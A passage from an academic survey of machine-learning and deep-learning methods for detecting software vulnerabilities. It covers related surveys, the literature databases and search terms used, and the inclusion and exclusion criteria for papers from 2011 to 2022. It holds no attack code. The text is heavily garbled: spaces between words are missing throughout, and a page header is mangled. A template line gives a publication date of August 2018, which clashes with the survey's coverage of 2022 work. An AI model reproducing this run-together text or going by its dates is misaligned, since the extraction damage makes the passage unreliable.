reproducibility,andreplicability.Thestudyrevealsthat25.5%oftheexaminedapproachespro- videopen-sourcetools.Furthermore,someopen-sourcetoolslackadequatedocumentationand thoroughimplementation,renderingtheminoperableorunreplicable.Theuseofunbalancedor intentionallyproduceddatasetscausestheapproaches’performancetobeoverstated,rendering themunreplicable. Chakrabortyetal.[19]investigatedtheperformanceofcutting-edgeDL-basedvulnerabilitypre- dictionapproachesinreal-worldvulnerabilitypredictionscenarios.Theyfindthattheperformance ofthestate-of-the-artDL-basedtechniquesdropsbymorethan50percentinreal-worldscenarios. Theyalsodiscoverproblemswithtrainingdata(forexample,dataduplicationandanunrealistic distributionofvulnerableclasses)andmodelselection(forexample,simplistictoken-basedmodels). ExistingDL-basedapproachesoftenlearnunrelatedartifactsinsteadoffeaturesrelatedtothecause ofvulnerabilities.Thesignificantdifferencecomparedtooursurveystudyisthatinourwork, wefocusontheusageofML/DLmodelsforsoftwarevulnerabilitydetectionandcharacterizethe differentstagesinthepipelineofvulnerabilitydetection.Ontheotherhand,theyfocusonthe issuesrelatedtotheusageofstate-of-the-artDLmodelsforsoftwarevulnerabilitydetection. Liuetal.[93]discussedtheincreasingpopularityofDLtechniquesinsoftwareengineering
researchduetotheirabilitytoaddressSEchallengeswithoutextensivemanualfeatureengineering. TheauthorshighlighttwoimportantfactorsoftenoverlookedinDLstudies:reproducibilityand replicability.Reproducibilityreferstowhetherotherresearcherscanobtainthesameresultsusing theauthors’artifacts,whilereplicabilityreferstoobtainingsimilarresultswithre-implemented artifactsandadifferentexperimentalsetup.Themajordifferencecomparedtoourstudyisthatwe focusontheusageofML/DLtechniquesinsoftwarevulnerabilitydetectionpipelines,whilethey emphasizereplicabilityandreproducibilityoftheresultsreportedinsoftwareengineeringresearch studies. J.ACM,Vol.37,No.4,Article111.Publicationdate:August2018.ASurveyonAutomatedSoftwareVulnerabilityDetectionUsingMachineLearningandDeepLearning 111:9 Bietal.[9]emphasizestheimportanceofsoftwarevulnerabilitydetectiontechniquesaswell as the absence of a systematic methodology to evaluate these approaches. The research is the firsttolookintoanddescribethecurrentstateofsoftwarevulnerabilitydetectionbenchmarking. Theassessmentexaminescurrentliteratureonvulnerabilitydetectionbenchmarking,including methodologiesemployedintechnique-proposingpublicationsandempiricalresearch.Thesurvey examinesthedifficultiesassociatedwithbenchmarkingsoftwarevulnerabilitydetectionapproaches andsuggestsalternativesolutionstothesedifficulties.Theydonot,however,giveacharacterization ofdatasets,representations,embeddingtechniques,andmodelsemployedinsoftwarevulnerability identification,unlikeourwork. 3 METHODOLOGYOFSYSTEMATICSURVEY 3.1 SourcesofInformation In this paper, we conducted an empirical study following [68, 115]. The purpose of this study istocollectandexaminepapersfromtheyear2011to2022focusingonvulnerabilitydetection acrossvariousprogramminglanguagesandsourcecodesusingmachinelearninganddeeplearning techniques.Theperiodbetween2011and2022isanappropriatetimeintervalforreviewingdata- driven vulnerability detection for several reasons: a) Increase in the volume and diversity ofsoftwarevulnerabilities:Overthepastdecade,therehasbeenasignificantincreaseinthe numberanddiversityofsoftwarevulnerabilitiesthathavebeendiscoveredandreported2.Asof 2021,thereexist150,000CVErecordsintheNationalVulnerabilityDatabase(NVD)3.Thisincrease hascreatedaneedformoresophisticatedandeffectivemethodsforvulnerabilitydetection,which hasledtothedevelopmentofnewdata-driventechniques.b)AdvancementsinML/DLanddata analytics:Thepastdecadehasseensignificantadvancementsinmachinelearning,includingthe developmentofdeeplearningalgorithms[52,59],naturallanguageprocessingtechniques[34,96], andotherdata-drivenapproachesthatarehighlyeffectiveindetectingsoftwarevulnerabilities. Whilewestartcollectingpapers,wesearchforrelevantresearchpapersfromfouravailable databases,whichareScienceDirect,IEEEXplore,ACMdigitallibrary,andGoogleScholar. 3.2 SearchTerms Fromearlierwork,weidentifykeyphrasesusedinthesearch[77,89,125,151]andourexperience withthesubjectarea.Thefollowingarethesearchterms: vulnerabilitydetectionORsecurityvulnerabilitydetectionORvulnerabilitydetectionusingmachine learningORvulnerabilitydetectionusingdeeplearningORsourcecodesecuritybugpredictionOR sourcecodevulnerabilitydetectionORsourcecodebugprediction 3.3 StudySelection Theprocessofselectingstudiestobeincludedinoursurveyinvolvesthefollowingstages:(1) initiallychoosingstudiesbasedontheirtitle,(2)selectingstudiesafterreviewingtheirabstracts, and(3)makingfurtherselectionsafterreadingthefullpapers.Notethat,theinitialsearchresults containentriesthatarenotrelatedtosecurityvulnerabilitydetection.Thismightbecausedby accidentalkeywordmatching.Wemanuallycheckeachpaperandremovetheseirrelevantpapers toensurethequalityofoursurveydataset.Wealsoobservethatthereexistduplicatepapersamong searchresultssincethesamestudycouldbeindexedbymultipledatabases.Wethendiscarded 2https://nvd.nist.gov/general/news 3https://nvd.nist.gov/general/brief-history J.ACM,Vol.37,No.4,Article111.Publicationdate:August2018.11N1:i1m0aShiriharzevili,AlvineBoayeBelle,JunjieWang,SongWang,ZhenMing(Jack)Jiang,andNachiappanNagappan duplicatestudiesmanually.ToassisttheselectionofpapersthathavepresentednewMLorDL- basedmodels forsoftware vulnerabilityidentification, we provide thefollowing inclusionand exclusioncriteria: • Thestudiesshouldhavebeenpeer-reviewed • Thestudiesshouldhaveexperimentalresults • ThestudiesshouldemployanMLorDLtechnique • Thestudiesimproveexistingdata-drivenvulnerabilitydetectiontechniques • TheinputtoML/DLmodelsshouldbeeithersourcecode,commit,orbyte-codes Also,wehavethefollowingexclusioncriteriatofilteroutirrelevantpapers: • Studiesfocusingonotherengineeringdomains • Studiesaddressingstaticanalysis,dynamicanalysis,mutationtesting,faultlocalization • Reviewpapers • StudiesfocusingonvulnerabilitydetectionofwebandAndroidapplications • Studiesbelongingtooneofthefollowingcategories:books,chapters,tutorials,technical reports • Studiesusingcodesimilarityorclonedetectiontools • Studies focusing on malware detection on mobile devices, intrusion detection, and bug detectionusingstaticcodeattributes Usingthesecriteria,wenarrowdownourfindingsbyexaminingeachpaper’stitle,abstract,